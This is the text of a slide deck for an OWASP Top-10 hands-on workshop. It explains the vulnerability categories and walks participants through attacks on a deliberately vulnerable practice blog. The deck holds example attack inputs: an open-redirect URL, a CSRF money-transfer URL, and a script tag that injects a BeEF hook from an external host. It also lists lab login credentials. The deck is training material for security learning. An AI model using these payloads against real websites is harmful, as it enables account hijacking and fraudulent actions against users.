OWASP Top-10 Hands-on Workshop

•Security Engineer @ SoftServe•NU “LP” student

whoami

•Web Application Security Assessment•Penetration Testing•Secure Software Development Lifecycle

What we do?

•Non-profit organization•Numerous chapters around the globe•Everyone can join•Open-Source

Open Web ApplicationSecurity Project

Meetings and conferences all around the globe

@AppSecEU ‘15 in Amsterdam

Knowledge base

OWASP Top-10Injection

Broken Auth and Session

ManagementXSS

Insecure Direct Object

References

Security misconfiguration

Sensitive Data Exposure

Missing Function Level

ControlCSRF

Using Known Vulnerable

Components

Unvalidated Redirects and

Forwards

OWASP is GOOD!Hackers• Methodologies how to hack

Developers• Methodologies how to implement things securely and fix them

Testers• The same that hackers do• Methodologies how to test security stuff on their projects

Demo Time

•Either go by scenario with me or try to find 10 vulnerabilities by yourself.•No scanners (DDoS alert).•Do not attack infrastructure. Only web application vulnerabilities here.•Do not attack people around you.•No punching.

Rules

•<open redirect url>•<change pass csrf url>•<Email for SE>•Credentials:

Let’s begin

terror0-9@gmail.com/passwordterror-admin0-9@gmail.com/admin

Open Redirectexample.com/smth?redirect_url=http://google.comCSRFbank.com/trans?acc1=1234&acc2=4321&ammount=10000

Open Redirect + CSRF

Cross-Site ScriptingSupply JS code instead of valid data which will be processed by the browserBroken AuthSession management flaws (HTTPOnly flag is missing in our case)

XSS + Broken Authentication

Inject this script into the website<script src=“<url to the hook>” type=“text/javascript”/>

BeEF

SQL-injectionSupply SQL operators and statements instead of valid data which will be processed with the server as SQL queries (not strings)Security misconfigurationCrypto misuse, wrong DB configuration, etcSensitive Data ExposureCritical info leakage

SQLi + Security Misconfiguration + Sensitive Data Exposure

Insecure Direct Object ReferenceAccess file you have no permission toMissing Function Level ControlAccess to restricted (sensitive) function.Using Components with known VulnerabilitiesVulnerable OS, libraries, frameworks, CMS, Algorithms, etc.

Everything else …

• Try it by yourselfhttps://github.com/Varyagovich/hole-blog• Try to fix the project• Use OWASP projects (attack/prevention cheat sheets and tools)• Contribute!

What to do next?

http://owasp-lviv.blogspot.com/

STAY SAFE!